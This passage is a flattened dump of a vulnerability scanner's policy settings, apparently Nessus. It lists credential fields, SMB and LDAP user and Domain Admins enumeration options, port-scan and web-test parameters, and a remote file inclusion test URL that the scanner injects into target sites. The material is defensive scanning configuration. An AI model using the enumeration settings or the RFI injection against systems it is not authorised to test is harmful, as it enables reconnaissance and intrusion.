host[checkbox]:Do a TCP ping checkbox Do a TCP ping yes yes 10180 Ping the remote host Ping the remote host[checkbox]:Do an ARP ping checkbox Do an ARP ping yes yes 10180 Ping the remote host Ping the remote host[entry]:TCP ping destination port(s) : entry TCP ping destination port(s) : built-in built-in 10335 Nessus TCP scanner Nessus TCP scanner[radio]:Firewall detection : radio Firewall detection : Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) 10399 SMB Use Domain SID to Enumerate Users SMB Use Domain SID to Enumerate Users[entry]:End UID : entry End UID : 1200 1200 10399 SMB Use Domain SID to Enumerate Users SMB Use Domain SID to Enumerate Users[entry]:Start UID : entry Start UID : 1000 1000 10662 Web mirroring Web mirroring[checkbox]:Follow dynamic pages : checkbox Follow dynamic pages : no 10662 Web mirroring Web mirroring[entry]:Excluded items regex : entry Excluded items regex : /server_privileges\.php|logout 10662 Web mirroring Web mirroring[entry]:Start page : entry Start page : / 10662 Web mirroring Web mirroring[entry]:Maximum depth : entry Maximum depth : 6 10662 Web mirroring Web mirroring[entry]:Number of pages to mirror : entry Number of pages to mirror : 1000 10860 SMB Use Host SID to Enumerate Local Users SMB Use Host SID to Enumerate Local Users[entry]:End UID : entry End UID : 1200 1200 10860 SMB Use Host SID to Enumerate Local Users SMB Use Host SID to Enumerate Local Users[entry]:Start UID : entry Start UID : 1000 1000 10870 Login configurations Login configurations[checkbox]:Only use Kerberos authentication for SMB checkbox Only use Kerberos authentication for SMB no 10870 Login configurations Login configurations[checkbox]:Only use NTLMv2 checkbox Only use NTLMv2 no yes 10870 Login configurations Login configurations[checkbox]:Never send SMB credentials in clear text checkbox Never send SMB credentials in clear text yes yes 10870 Login configurations Login configurations[entry]:Additional SMB domain (optional) (3) : entry Additional SMB domain (optional) (3) : 10870 Login configurations Login configurations[password]:Additional SMB password (3) : password Additional SMB password (3) : 10870 Login configurations Login configurations[entry]:Additional SMB account (3) : entry Additional SMB account (3) : 10870 Login configurations Login configurations[entry]:Additional SMB domain (optional) (2) : entry Additional SMB domain (optional) (2) : 10870 Login configurations Login configurations[password]:Additional SMB password (2) : password Additional SMB password (2) : 10870 Login configurations Login configurations[entry]:Additional SMB account (2) : entry Additional SMB account (2) : 10870 Login configurations Login configurations[entry]:Additional SMB domain (optional) (1) : entry Additional SMB domain (optional) (1) : 10870 Login configurations Login configurations[password]:Additional SMB password (1) : password Additional SMB password (1) : 10870 Login configurations Login configurations[entry]:Additional SMB account (1) : entry Additional SMB account (1) : 10870 Login configurations Login configurations[radio]:SMB password type : radio SMB password type : Password;LM Hash;NTLM Hash 10870 Login configurations Login configurations[entry]:SMB domain (optional) : entry SMB domain (optional) : 10870 Login configurations Login configurations[password]:SMB password : password SMB password : 10870 Login configurations Login configurations[entry]:SMB account : entry SMB account : 10870 Login configurations Login configurations[password]:IPMI password (sent in clear) : password IPMI password (sent in clear) : 10870 Login configurations Login configurations[entry]:IPMI account : entry IPMI account : 10870 Login configurations Login configurations[password]:IMAP password (sent in clear) : password IMAP password (sent in clear) : 10870 Login configurations Login configurations[entry]:IMAP account : entry IMAP account : 10870 Login configurations Login configurations[password]:POP3 password (sent in clear) : password POP3 password (sent in clear) : 10870 Login configurations Login configurations[entry]:POP3 account : entry POP3 account : 10870 Login configurations Login configurations[password]:POP2 password (sent in clear) : password POP2 password (sent in clear) : 10870 Login configurations Login configurations[entry]:POP2 account : entry POP2 account : 10870 Login configurations Login configurations[entry]:FTP writeable directory : entry FTP writeable directory : /incoming 10870 Login configurations Login configurations[password]:FTP password (sent in clear) : password FTP password (sent in clear) : nessus@nessus.org 10870 Login configurations Login configurations[entry]:FTP account : entry FTP account : anonymous 10870 Login configurations Login configurations[password]:NNTP password (sent in clear) : password NNTP password (sent in clear) : 10870 Login configurations Login configurations[entry]:NNTP account : entry NNTP account : 10870 Login configurations Login configurations[password]:HTTP password (sent in clear) : password HTTP password (sent in clear) : 10870 Login configurations Login configurations[entry]:HTTP account : entry HTTP account : 10917 SMB Scope SMB Scope[checkbox]:Request information about the domain checkbox Request information about the domain yes yes 11038 SMTP settings SMTP settings[entry]:To address : entry To address : postmaster@[AUTO_REPLACED_IP] postmaster@[AUTO_REPLACED_IP] 11038 SMTP settings SMTP settings[entry]:From address : entry From address : nobody@example.com nobody@example.com 11038 SMTP settings SMTP settings[entry]:Third party domain : entry Third party domain : example.com example.com 11149 HTTP login page HTTP login page[checkbox]:Abort web application tests if login fails checkbox Abort web application tests if login fails no 11149 HTTP login page HTTP login page[checkbox]:Case insensitive regex checkbox Case insensitive regex no no 11149 HTTP login page HTTP login page[checkbox]:Match regex on HTTP headers checkbox Match regex on HTTP headers no no 11149 HTTP login page HTTP login page[checkbox]:Invert test (disconnected if regex matches) checkbox Invert test (disconnected if regex matches) no no 11149 HTTP login page HTTP login page[entry]:Authenticated regex : entry Authenticated regex : 11149 HTTP login page HTTP login page[entry]:Follow 30x redirections (# of levels) : entry Follow 30x redirections (# of levels) : 2 0 11149 HTTP login page HTTP login page[entry]:Check authentication on page : entry Check authentication on page : 11149 HTTP login page HTTP login page[entry]:Re-authenticate delay (seconds) : entry Re-authenticate delay (seconds) : 11149 HTTP login page HTTP login page[checkbox]:Automated login page search checkbox Automated login page search no 11149 HTTP login page HTTP login page[radio]:Login form method : radio Login form method : POST;GET POST 11149 HTTP login page HTTP login page[entry]:Login form fields : entry Login form fields : user=%USER%&pass=%PASS% 11149 HTTP login page HTTP login page[entry]:Login form : entry Login form : 11149 HTTP login page HTTP login page[entry]:Login page : entry Login page : / 11219 Nessus SYN scanner Nessus SYN scanner[radio]:Firewall detection : radio Firewall detection : Automatic (normal);Disabled (softer);Do not detect RST rate limitation (soft);Ignore closed ports (aggressive) Automatic (normal) 12288 Global variable settings Global variable settings[checkbox]:Enable CRL checking (connects to Internet) checkbox Enable CRL checking (connects to Internet) no no 12288 Global variable settings Global variable settings[checkbox]:Enumerate all SSL ciphers checkbox Enumerate all SSL ciphers yes yes 12288 Global variable settings Global variable settings[password]:SSL password for SSL key : password SSL password for SSL key : 12288 Global variable settings Global variable settings[file]:SSL key to use : file SSL key to use : 12288 Global variable settings Global variable settings[file]:SSL CA to trust : file SSL CA to trust : 12288 Global variable settings Global variable settings[file]:SSL certificate to use : file SSL certificate to use : 12288 Global variable settings Global variable settings[entry]:HTTP User-Agent entry HTTP User-Agent Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) 12288 Global variable settings Global variable settings[radio]:Report paranoia radio Report paranoia Normal;Avoid false alarms;Paranoid (more false alarms) Normal 12288 Global variable settings Global variable settings[radio]:Report verbosity radio Report verbosity Normal;Quiet;Verbose Normal 12288 Global variable settings Global variable settings[checkbox]:Thorough tests (slow) checkbox Thorough tests (slow) no no 12288 Global variable settings Global variable settings[checkbox]:Enable experimental scripts checkbox Enable experimental scripts no 12288 Global variable settings Global variable settings[radio]:Network type radio Network type Mixed (use RFC 1918);Private LAN;Public WAN (Internet) Mixed (use RFC 1918) 12288 Global variable settings Global variable settings[checkbox]:Enable CGI scanning checkbox Enable CGI scanning no no 12288 Global variable settings Global variable settings[checkbox]:Do not log in with user accounts not specified in the policy checkbox Do not log in with user accounts not specified in the policy no yes 12288 Global variable settings Global variable settings[checkbox]:Probe services on every port checkbox Probe services on every port yes yes 14273 SSH settings SSH settings[password]:Additional SSH password (5) : password Additional SSH password (5) : 14273 SSH settings SSH settings[entry]:Additional SSH user name (5) : entry Additional SSH user name (5) : 14273 SSH settings SSH settings[password]:Additional SSH password (4) : password Additional SSH password (4) : 14273 SSH settings SSH settings[entry]:Additional SSH user name (4) : entry Additional SSH user name (4) : 14273 SSH settings SSH settings[password]:Additional SSH password (3) : password Additional SSH password (3) : 14273 SSH settings SSH settings[entry]:Additional SSH user name (3) : entry Additional SSH user name (3) : 14273 SSH settings SSH settings[password]:Additional SSH password (2) : password Additional SSH password (2) : 14273 SSH settings SSH settings[entry]:Additional SSH user name (2) : entry Additional SSH user name (2) : 14273 SSH settings SSH settings[password]:Additional SSH password (1) : password Additional SSH password (1) : 14273 SSH settings SSH settings[entry]:Additional SSH user name (1) : entry Additional SSH user name (1) : 14273 SSH settings SSH settings[entry]:Client version : entry Client version : OpenSSH_5.0 OpenSSH_5.0 14273 SSH settings SSH settings[entry]:Preferred SSH port : entry Preferred SSH port : 22 22 14273 SSH settings SSH settings[file]:SSH known_hosts file : file SSH known_hosts file : 14273 SSH settings SSH settings[password]:Escalation password : password Escalation password : 14273 SSH settings SSH settings[entry]:Escalation account : entry Escalation account : root 14273 SSH settings SSH settings[entry]:su login : entry su login : 14273 SSH settings SSH settings[entry]:Privilege elevation binary path (directory) : entry Privilege elevation binary path (directory) : 14273 SSH settings SSH settings[radio]:Elevate privileges with : radio Elevate privileges with : Nothing;sudo;su;su+sudo;dzdo;pbrun;Cisco 'enable' 14273 SSH settings SSH settings[password]:Passphrase for SSH key : password Passphrase for SSH key : 14273 SSH settings SSH settings[file]:SSH private key to use : file SSH private key to use : 14273 SSH settings SSH settings[file]:SSH public key to use : file SSH public key to use : 14273 SSH settings SSH settings[password]:SSH password (unsafe!) : password SSH password (unsafe!) : 14273 SSH settings SSH settings[entry]:SSH user name : entry SSH user name : root 16193 Antivirus Software Check Antivirus Software Check[entry]:Delay (in days, between 0 and 7) : entry Delay (in days, between 0 and 7) : 0 0 17351 Kerberos configuration Kerberos configuration[entry]:Kerberos Realm (SSH only) : entry Kerberos Realm (SSH only) : 17351 Kerberos configuration Kerberos configuration[radio]:Kerberos KDC Transport : radio Kerberos KDC Transport : tcp 17351 Kerberos configuration Kerberos configuration[entry]:Kerberos KDC Port : entry Kerberos KDC Port : 88 17351 Kerberos configuration Kerberos configuration[entry]:Kerberos Key Distribution Center (KDC) : entry Kerberos Key Distribution Center (KDC) : 19762 SNMP settings SNMP settings[radio]:SNMPv3 privacy algorithm : radio SNMPv3 privacy algorithm : AES;DES 19762 SNMP settings SNMP settings[password]:SNMPv3 privacy password : password SNMPv3 privacy password : 19762 SNMP settings SNMP settings[radio]:SNMPv3 authentication algorithm : radio SNMPv3 authentication algorithm : MD5;SHA1 19762 SNMP settings SNMP settings[password]:SNMPv3 authentication password : password SNMPv3 authentication password : 19762 SNMP settings SNMP settings[entry]:SNMPv3 user name : entry SNMPv3 user name : 19762 SNMP settings SNMP settings[entry]:Additional UDP port (3) : entry Additional UDP port (3) : 161 19762 SNMP settings SNMP settings[entry]:Additional UDP port (2) : entry Additional UDP port (2) : 161 19762 SNMP settings SNMP settings[entry]:Additional UDP port (1) : entry Additional UDP port (1) : 161 19762 SNMP settings SNMP settings[entry]:UDP port : entry UDP port : 161 161 19762 SNMP settings SNMP settings[entry]:Community name (3) : entry Community name (3) : 19762 SNMP settings SNMP settings[entry]:Community name (2) : entry Community name (2) : 19762 SNMP settings SNMP settings[entry]:Community name (1) : entry Community name (1) : 19762 SNMP settings SNMP settings[entry]:Community name : entry Community name : public 21744 Cleartext protocols settings Cleartext protocols settings[checkbox]:Try to perform patch level checks over rexec checkbox Try to perform patch level checks over rexec no no 21744 Cleartext protocols settings Cleartext protocols settings[checkbox]:Try to perform patch level checks over rsh checkbox Try to perform patch level checks over rsh no no 21744 Cleartext protocols settings Cleartext protocols settings[checkbox]:Try to perform patch level checks over telnet checkbox Try to perform patch level checks over telnet no no 21744 Cleartext protocols settings Cleartext protocols settings[password]:Password (unsafe!) : password Password (unsafe!) : 21744 Cleartext protocols settings Cleartext protocols settings[entry]:User name : entry User name : 22076 Oracle Settings Oracle Settings[checkbox]:Test default accounts (slow) checkbox Test default accounts (slow) no no 22076 Oracle Settings Oracle Settings[entry]:Oracle SID : entry Oracle SID : 22481 Do not scan fragile devices Do not scan fragile devices[checkbox]:Scan Novell Netware hosts checkbox Scan Novell Netware hosts no no 22481 Do not scan fragile devices Do not scan fragile devices[checkbox]:Scan Network Printers checkbox Scan Network Printers no no 22964 Service Detection Service Detection[radio]:Test SSL based services radio Test SSL based services Known SSL ports;All;None Known SSL ports 33812 Port scanners settings Port scanners settings[checkbox]:Only run network port scanners if local port enumeration failed checkbox Only run network port scanners if local port enumeration failed yes yes 33812 Port scanners settings Port scanners settings[checkbox]:Check open TCP ports found by local port enumerators checkbox Check open TCP ports found by local port enumerators no no 33815 Database settings Database settings[radio]:SQL Server auth type: radio SQL Server auth type: Windows;SQL 33815 Database settings Database settings[radio]:Oracle auth type: radio Oracle auth type: NORMAL;SYSOPER;SYSDBA 33815 Database settings Database settings[entry]:Database port to use : entry Database port to use : 33815 Database settings Database settings[entry]:Database SID : entry Database SID : 33815 Database settings Database settings[radio]:DB Type : radio DB Type : Oracle;SQL Server;MySQL;DB2;Informix/DRDA;PostgreSQL 33815 Database settings Database settings[password]:Password : password Password : 33815 Database settings Database settings[entry]:Login : entry Login : 35703 SMB Registry : Start the Registry Service during the scan SMB Registry : Start the Registry Service during the scan[checkbox]:Enable administrative shares during the scan checkbox Enable administrative shares during the scan no no 35703 SMB Registry : Start the Registry Service during the scan SMB Registry : Start the Registry Service during the scan[checkbox]:Start the registry service during the scan checkbox Start the registry service during the scan no no 39471 Web Application Tests Settings Web Application Tests Settings[entry]:URL for Remote File Inclusion : entry URL for Remote File Inclusion : http://rfi.nessus.org/rfi.txt 39471 Web Application Tests Settings Web Application Tests Settings[checkbox]:Test embedded web servers checkbox Test embedded web servers no 39471 Web Application Tests Settings Web Application Tests Settings[radio]:Stop at first flaw radio Stop at first flaw per CGI;per port (quicker);per parameter (slow);look for all flaws (slower) 39471 Web Application Tests Settings Web Application Tests Settings[checkbox]:HTTP Parameter Pollution checkbox HTTP Parameter Pollution no 39471 Web Application Tests Settings Web Application Tests Settings[radio]:Combinations of arguments values radio Combinations of arguments values one value;some pairs;all pairs (slower but efficient);some combinations;all combinations (extremely slow) 39471 Web Application Tests Settings Web Application Tests Settings[checkbox]:Try all HTTP methods checkbox Try all HTTP methods no 39471 Web Application Tests Settings Web Application Tests Settings[entry]:Maximum run time (min) : entry Maximum run time (min) : 60 39471 Web Application Tests Settings Web Application Tests Settings[checkbox]:Enable web applications tests checkbox Enable web applications tests no 42893 HTTP cookies import HTTP cookies import[file]:Cookies file : file Cookies file : 52616 Wake-on-LAN Wake-on-LAN[entry]:Time to wait (in minutes) for the systems to boot: entry Time to wait (in minutes) for the systems to boot: 5 5 52616 Wake-on-LAN Wake-on-LAN[file]:List of MAC addresses for Wake-on-LAN: file List of MAC addresses for Wake-on-LAN: 57029 Patch Management: SCCM Server Settings Patch Management: SCCM Server Settings[password]:SCCM Password : password SCCM Password : 57029 Patch Management: SCCM Server Settings Patch Management: SCCM Server Settings[entry]:SCCM Username : entry SCCM Username : 57029 Patch Management: SCCM Server Settings Patch Management: SCCM Server Settings[entry]:SCCM Domain : entry SCCM Domain : 57029 Patch Management: SCCM Server Settings Patch Management: SCCM Server Settings[entry]:SCCM Server : entry SCCM Server : 57031 Patch Management: WSUS Server Settings Patch Management: WSUS Server Settings[checkbox]:Verify SSL Certificate : checkbox Verify SSL Certificate : no 57031 Patch Management: WSUS Server Settings Patch Management: WSUS Server Settings[checkbox]:SSL : checkbox SSL : no 57031 Patch Management: WSUS Server Settings Patch Management: WSUS Server Settings[password]:WSUS Password : password WSUS Password : 57031 Patch Management: WSUS Server Settings Patch Management: WSUS Server Settings[entry]:WSUS Username : entry WSUS Username : 57031 Patch Management: WSUS Server Settings Patch Management: WSUS Server Settings[entry]:WSUS Port : entry WSUS Port : 57031 Patch Management: WSUS Server Settings Patch Management: WSUS Server Settings[entry]:WSUS Server : entry WSUS Server : 57063 Patch Management: Red Hat Satellite Server Settings Patch Management: Red Hat Satellite Server Settings[password]:Red Hat Satellite password(s) : password Red Hat Satellite password(s) : 57063 Patch Management: Red Hat Satellite Server Settings Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite username(s) : entry Red Hat Satellite username(s) : 57063 Patch Management: Red Hat Satellite Server Settings Patch Management: Red Hat Satellite Server Settings[checkbox]:Verify SSL certificates : checkbox Verify SSL certificates : no 57063 Patch Management: Red Hat Satellite Server Settings Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite port(s) : entry Red Hat Satellite port(s) : 443 57063 Patch Management: Red Hat Satellite Server Settings Patch Management: Red Hat Satellite Server Settings[entry]:Red Hat Satellite server(s) [separated w/ semicolons] : entry Red Hat Satellite server(s) [separated w/ semicolons] : 57395 VMware SOAP API Settings VMware SOAP API Settings[checkbox]:Ignore SSL Certificate : checkbox Ignore SSL Certificate : no 57395 VMware SOAP API Settings VMware SOAP API Settings[password]:VMware password : password VMware password : 57395 VMware SOAP API Settings VMware SOAP API Settings[entry]:VMware user name : entry VMware user name : 57861 IBM iSeries Credentials IBM iSeries Credentials[password]:Password : password Password : 57861 IBM iSeries Credentials IBM iSeries Credentials[entry]:Login : entry Login : 58038 LDAP 'Domain Admins' Group Membership Enumeration LDAP 'Domain Admins' Group Membership Enumeration[entry]:Max results : entry Max results : 1000 58038 LDAP 'Domain Admins' Group Membership Enumeration LDAP 'Domain Admins' Group Membership Enumeration[password]:LDAP password : password LDAP password : 58038 LDAP 'Domain Admins' Group Membership Enumeration LDAP 'Domain Admins' Group Membership Enumeration[entry]:LDAP user : entry LDAP user : 59275 Malicious Process Detection Malicious Process Detection[file]:Known good MD5 hashes (optional) : file Known good MD5 hashes (optional) : 59275 Malicious Process Detection Malicious Process Detection[file]:Additional MD5 hashes (optional) : file Additional MD5 hashes (optional) : 60024 ADSI Settings ADSI Settings[password]:Domain Password 5: password Domain Password 5: 60024 ADSI Settings ADSI Settings[entry]:Domain Username 5: entry Domain Username 5: 60024 ADSI Settings ADSI Settings[entry]:Domain 5: entry Domain 5: 60024 ADSI Settings ADSI Settings[entry]:Domain Controller 5: entry Domain Controller 5: 60024 ADSI Settings ADSI Settings[password]:Domain Password 4: password Domain Password 4: 60024 ADSI Settings ADSI Settings[entry]:Domain Username 4: entry Domain Username 4: 60024 ADSI Settings ADSI Settings[entry]:Domain 4: entry Domain 4: 60024 ADSI Settings ADSI Settings[entry]:Domain Controller 4: entry Domain Controller 4: 60024 ADSI Settings ADSI Settings[password]:Domain Password 3: password Domain Password 3: 60024 ADSI Settings ADSI Settings[entry]:Domain Username 3: entry Domain Username 3: 60024 ADSI Settings ADSI Settings[entry]:Domain 3: entry Domain 3: 60024 ADSI Settings ADSI Settings[entry]:Domain Controller 3: entry Domain Controller 3: 60024 ADSI Settings ADSI Settings[password]:Domain Password 2: password Domain Password 2: 60024 ADSI Settings ADSI Settings[entry]:Domain Username 2: entry Domain Username 2: 60024 ADSI Settings ADSI Settings[entry]:Domain 2: entry Domain 2: 60024 ADSI Settings ADSI Settings[entry]:Domain Controller 2: entry Domain Controller 2: 60024 ADSI Settings ADSI Settings[password]:Domain Password : password Domain Password : 60024 ADSI Settings ADSI Settings[entry]:Domain Username : entry Domain Username : 60024 ADSI Settings ADSI Settings[entry]:Domain : entry Domain : 60024 ADSI Settings ADSI Settings[entry]:Domain Controller : entry Domain Controller : 60032 Apple Profile Manager API Settings Apple Profile Manager API Settings[entry]:Device Update Timeout (Minutes) : entry Device Update Timeout (Minutes) : 5 5 60032 Apple Profile Manager API Settings Apple Profile Manager API Settings[checkbox]:Force Device Updates : checkbox Force Device Updates : yes yes 60032 Apple Profile Manager API Settings Apple Profile Manager API Settings[checkbox]:Verify SSL Certificate : checkbox Verify SSL Certificate : no 60032 Apple Profile Manager API Settings Apple Profile Manager API Settings[checkbox]:SSL : checkbox SSL : yes 60032 Apple Profile Manager API Settings Apple Profile Manager API Settings[password]:Apple Profile Manager password : password Apple Profile Manager password : 60032 Apple Profile Manager API Settings Apple Profile Manager API Settings[entry]:Apple Profile Manager username : entry Apple Profile Manager username : 60032 Apple Profile Manager API Settings Apple Profile Manager API Settings[entry]:Apple Profile Manager port : entry Apple Profile Manager port : 443 60032 Apple Profile Manager API Settings Apple Profile Manager API Settings[entry]:Apple Profile Manager server : entry Apple Profile Manager server : 62558 Patch Management: IBM Tivoli Endpoint Manager Server Settings Patch Management: IBM Tivoli Endpoint Manager Server Settings[checkbox]:Verify SSL Certificate : checkbox Verify SSL Certificate : no 62558 Patch Management: IBM Tivoli Endpoint Manager Server Settings Patch Management: IBM Tivoli Endpoint Manager Server Settings[checkbox]:SSL : checkbox SSL : no 62558 Patch Management: IBM Tivoli Endpoint Manager Server Settings Patch Management: IBM Tivoli Endpoint Manager Server Settings[password]:Web Reports Password : password Web Reports Password : 62558 Patch Management: IBM Tivoli Endpoint Manager Server Settings Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Username : entry Web Reports Username : 62558 Patch Management: IBM Tivoli Endpoint Manager Server Settings Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Port : entry Web Reports Port : 62558 Patch Management: IBM Tivoli Endpoint Manager Server Settings Patch Management: IBM Tivoli Endpoint Manager Server Settings[entry]:Web Reports Server : entry Web Reports Server : 63060 VMware vCenter SOAP API Settings VMware vCenter SOAP API Settings[checkbox]:Verify SSL Certificate : checkbox Verify SSL Certificate : no 63060 VMware vCenter SOAP API Settings VMware vCenter SOAP API Settings[checkbox]:SSL : checkbox SSL : yes 63060 VMware vCenter SOAP API Settings VMware vCenter SOAP API Settings[password]:VMware vCenter password : password VMware vCenter password : 63060 VMware vCenter SOAP API Settings VMware vCenter SOAP API Settings[entry]:VMware vCenter user name : entry VMware vCenter user name : 63060 VMware vCenter SOAP API Settings VMware vCenter SOAP API Settings[entry]:VMware vCenter port : entry VMware vCenter port : 443 63060 VMware vCenter SOAP API Settings VMware vCenter SOAP API Settings[entry]:VMware vCenter host : entry VMware vCenter host : 64286 Palo Alto Networks PAN-OS Settings Palo Alto Networks PAN-OS Settings[checkbox]:Verify SSL Certificate : checkbox Verify SSL Certificate : no 64286 Palo Alto Networks PAN-OS Settings Palo Alto Networks PAN-OS Settings[entry]:Palo Alto Port : entry Palo Alto Port : 443 64286 Palo Alto Networks PAN-OS Settings Palo Alto Networks PAN-OS Settings[password]:Palo Alto Password : password Palo Alto Password : 64286 Palo Alto Networks PAN-OS Settings Palo Alto Networks PAN-OS Settings[entry]:Palo Alto Username : entry Palo Alto Username : 66334 Patch Report Patch Report[checkbox]:Display the superseded patches in the report checkbox Display the superseded patches in the report yes no 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:OVAL Result Type #5 : radio OVAL Result Type #5 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Profile ID #5 : entry SCAP Profile ID #5 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #5 : entry SCAP Benchmark ID #5 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #5 : entry SCAP Data Stream ID (1.2 only) #5 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:SCAP Version #5 : radio SCAP Version #5 : 1.2;1.1;1.0 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[file]:SCAP File (zip) #5 : file SCAP File (zip) #5 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:OVAL Result Type #4 : radio OVAL Result Type #4 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Profile ID #4 : entry SCAP Profile ID #4 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #4 : entry SCAP Benchmark ID #4 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #4 : entry SCAP Data Stream ID (1.2 only) #4 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:SCAP Version #4 : radio SCAP Version #4 : 1.2;1.1;1.0 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[file]:SCAP File (zip) #4 : file SCAP File (zip) #4 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:OVAL Result Type #3 : radio OVAL Result Type #3 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Profile ID #3 : entry SCAP Profile ID #3 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #3 : entry SCAP Benchmark ID #3 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #3 : entry SCAP Data Stream ID (1.2 only) #3 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:SCAP Version #3 : radio SCAP Version #3 : 1.2;1.1;1.0 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[file]:SCAP File (zip) #3 : file SCAP File (zip) #3 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:OVAL Result Type #2 : radio OVAL Result Type #2 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Profile ID #2 : entry SCAP Profile ID #2 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #2 : entry SCAP Benchmark ID #2 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #2 : entry SCAP Data Stream ID (1.2 only) #2 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:SCAP Version #2 : radio SCAP Version #2 : 1.2;1.1;1.0 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[file]:SCAP File (zip) #2 : file SCAP File (zip) #2 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:OVAL Result Type #1 : radio OVAL Result Type #1 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Profile ID #1 : entry SCAP Profile ID #1 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Benchmark ID #1 : entry SCAP Benchmark ID #1 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #1 : entry SCAP Data Stream ID (1.2 only) #1 : 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[radio]:SCAP Version #1 : radio SCAP Version #1 : 1.2;1.1;1.0 66756 SCAP Windows Compliance Checks SCAP Windows Compliance Checks[file]:SCAP File (zip) #1 : file SCAP File (zip) #1 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:OVAL Result Type #5 : radio OVAL Result Type #5 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Profile ID #5 : entry SCAP Profile ID #5 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #5 : entry SCAP Benchmark ID #5 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #5 : entry SCAP Data Stream ID (1.2 only) #5 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:SCAP Version #5 : radio SCAP Version #5 : 1.2;1.1;1.0 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[file]:SCAP File (zip) #5 : file SCAP File (zip) #5 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:OVAL Result Type #4 : radio OVAL Result Type #4 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Profile ID #4 : entry SCAP Profile ID #4 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #4 : entry SCAP Benchmark ID #4 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #4 : entry SCAP Data Stream ID (1.2 only) #4 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:SCAP Version #4 : radio SCAP Version #4 : 1.2;1.1;1.0 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[file]:SCAP File (zip) #4 : file SCAP File (zip) #4 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:OVAL Result Type #3 : radio OVAL Result Type #3 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Profile ID #3 : entry SCAP Profile ID #3 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #3 : entry SCAP Benchmark ID #3 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Data Stream ID (1.2 only) #3 : entry SCAP Data Stream ID (1.2 only) #3 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:SCAP Version #3 : radio SCAP Version #3 : 1.2;1.1;1.0 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[file]:SCAP File (zip) #3 : file SCAP File (zip) #3 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[radio]:OVAL Result Type #2 : radio OVAL Result Type #2 : Full results w/ system characteristics;Full results w/o system characteristics;Thin results 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Profile ID #2 : entry SCAP Profile ID #2 : 66757 SCAP Linux Compliance Checks SCAP Linux Compliance Checks[entry]:SCAP Benchmark ID #2 : entry 